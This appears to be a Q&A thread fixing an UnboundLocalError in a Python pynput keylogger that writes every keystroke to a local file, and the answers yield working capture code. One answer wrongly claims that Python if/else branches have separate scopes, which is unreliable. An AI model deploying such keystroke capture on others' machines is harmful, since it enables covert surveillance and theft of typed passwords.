# UnboundLocalError local variable 'K' referenced before assignment

Tags: python

So i wanted to create a keylogger with python and i get this error, checked some threads already and they said i should use global but my variable is defined for different things twice and if i use global, it wouldn't be able to do it

```
from pynput import keyboard

def KeyInput():
    with keyboard.Listener(on_press=KeyLog) as listener:
        # whenever there is a press on a key on the keyboard, it's directed to KeyLog function
        listener.join()
def KeyLog(key):
    if type(key) == keyboard._win32.KeyCode:
        K = key.char
        # normal characters like letters
    else:
        # keys like ctrl, caps lock, windows, etc
        if 'cmd' in str(key):
            str(key).replace('cmd', 'Windows')
        else:
            K = ' '+str(key)+' '
    data = str(K)
    with open('keylogs.txt', 'a') as File:
        File.write(data+'\n')
        File.close()
KeyInput()
KeyLog()
```

Answer (score 1, accepted):

Looks like you forgot to assign the result of `str(key).replace`.  Do:

```
    if type(key) == keyboard._win32.KeyCode:
        K = key.char
        # normal characters like letters
    else:
        # keys like ctrl, caps lock, windows, etc
        if 'cmd' in str(key):
            K = str(key).replace('cmd', 'Windows')  # <-- assign to K
        else:
            K = ' '+str(key)+' '
    data = str(K)
    with open('keylogs.txt', 'a') as File:
        File.write(data+'\n')
        File.close()
```

and now `K` has a value in each of your `if/else` branches.

Better yet (IMO), since you already convert `K` to a `str` in two out of the three branches, and then re-convert it to make sure `data` is a `str` before you write it, just set `data` to a `str` value in all three branches and then you don't need the extra variable:

```
    if isinstance(key, keyboard._win32.KeyCode):
        # normal characters like letters
        data = str(key.char)
    else:
        # keys like ctrl, caps lock, windows, etc
        if 'cmd' in str(key):
            data = str(key).replace('cmd', 'Windows')
        else:
            data = f' {key} '
    with open('keylogs.txt', 'a') as file:
        file.write(data+'\n')
```

Note that if you `open()` a file using `with`, the `close()` is unnecessary because it gets called automatically after the `with` context ends.

Comment: thanks it worked! that's a better idea to use one variable instead of different ones

Answer (score 0):

`K` variable is local to the `if` statement (actually, there are 2 different variables with the some name, one inside `if` scope, and a different one inside `else`). You should define K outside of this statement and initialize it with some empty value. Something like this:

```
def KeyLog(key):
    K = ''
    if type(key) == keyboard._win32.KeyCode:
        K = key.char
    else:
        if 'cmd' in str(key):
            K = str(key).replace('cmd', 'Windows')
        else:
            K = ' '+str(key)+' '
    data = str(K)
    with open('keylogs.txt', 'a') as File:
        File.write(data+'\n')
        File.close()
```

Looks unnecesary, but this way K exists outside the `if` scope so it should be ok to acces it in `str(K)`.

Comment: This causes nothing to be logged for the `cmd`-key case.  I think OP meant to log it with `cmd` changed to `Windows`.

Comment: yes but now the file that it creates is empty because it's not keylogging Windows key anymore but using the empty variable for that

Comment: Oh, I didn't notice that. I'll edit my answer.